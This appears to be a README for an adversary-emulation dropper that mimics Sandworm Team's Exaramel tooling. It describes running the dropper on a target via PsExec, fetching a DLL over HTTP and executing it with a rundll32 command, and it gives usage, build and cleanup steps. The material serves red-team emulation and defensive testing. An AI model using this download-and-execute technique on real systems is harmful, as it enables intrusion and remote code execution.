Exaramel Windows Dropper
This program is used in step5 of the sandworm scenario to download and execute Exaramel-Windows.dll.
This program is executed on target via PsExec.py.
This program then downloads the DLL via HTTP and URLDownloadToFile.
The downloaded DLL is then executed via the C standard library:
system("rundll32.exe evil.dll,Start")
Quick Start
Execute this program on Windows:
.\Exaramel-Windows-Dropper.exe <url> <file_path>
.\Exaramel-windows-Dropper.exe .\Exaramel-Windows.dll
Note: This program does not work with self-signed certificates unless you import the certificate on the target system first.
Build Instructions
Download and install a C++ compiler: https://jmeubank.github.io/tdm-gcc/download/
Run the make.bat script from a terminal (cmd.exe):
You should have 'Exaramel-Windows-Dropper.exe' in the current working directory.
Cleanup Instructions
Delete Exaramel-Windows-Dropper.exe and any downloaded files.
Reboot the system to flush any DLL's from process memory.
CTI Evidence
Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.